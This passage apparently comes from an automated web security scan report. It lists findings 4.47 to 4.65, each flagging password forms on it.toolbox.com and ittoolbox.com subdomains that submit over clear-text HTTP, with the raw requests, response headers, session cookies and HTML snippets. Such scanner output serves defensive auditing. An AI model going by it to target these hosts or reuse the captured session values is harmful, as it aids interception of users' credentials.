<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.47. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/venture-and-gender-43847

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66046
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Venture and
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/venture-and-gender-43847" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.48. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/why-should-i-change-40067

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Why Should
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/why-should-i-change-40067" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.49. http://it.toolbox.com/blogs/start  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/start

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/start HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51361
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Start a new
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/start" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.50. http://it.toolbox.com/communities/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /communities/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /communities/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48463
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/communities/" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'm_m_tabContainer_rptTabContents_ctl00_btnSearch_btnCTA')" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.51. http://it.toolbox.com/companies/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /companies/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /companies/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62657
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/companies/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.52. http://it.toolbox.com/companies/white-papers/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /companies/white-papers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /companies/white-papers/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86960
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   White Paper
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/companies/white-papers/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.53. http://it.toolbox.com/groups/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /groups/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /groups/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Groups

...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/groups/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.54. http://it.toolbox.com/home/recover-password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/recover-password

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /home/recover-password HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25307
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Recover My
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/recover-password" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.55. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /home/register HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/register" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top">
                   <input name="m$m$r$s$txtPassword" type="password" id="m_m_r_s_txtPassword" class="textbox310" tabindex="1005" />
               </td>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.56. http://it.toolbox.com/home/search/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /home/search/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37016
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/search/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.57. http://it.toolbox.com/home/signin  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/signin

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /home/signin HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25134
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Sign In
</
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/signin" id="aspnetForm">
<div>
...[SNIP]...
<div class="spacer">
<input name="m$m$password" type="password" id="m_m_password" class="textboxmediumsmall floatright" defaultButton="m_m_submit1_btnCTA" />
<span class="size12 anthracite">
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.58. http://it.toolbox.com/jobs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40888
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Jobs
</tit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/jobs/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.59. http://it.toolbox.com/people/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /people/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114614
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/people/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.60. http://it.toolbox.com/people/dentrekin/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/dentrekin/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /people/dentrekin/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58359
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Demian Entr
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/people/dentrekin/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.61. http://it.toolbox.com/topics/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /topics/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77283
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/topics/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.62. http://java.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: java.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59140
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Java Commun
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.63. http://knowledgemanagement.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://knowledgemanagement.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: knowledgemanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Knowledge M
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.64. http://linux.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://linux.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: linux.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72604
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Linux Commu
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.65. http://networking.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networking.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: networking.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 91759
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:14 GMT
Connection: close


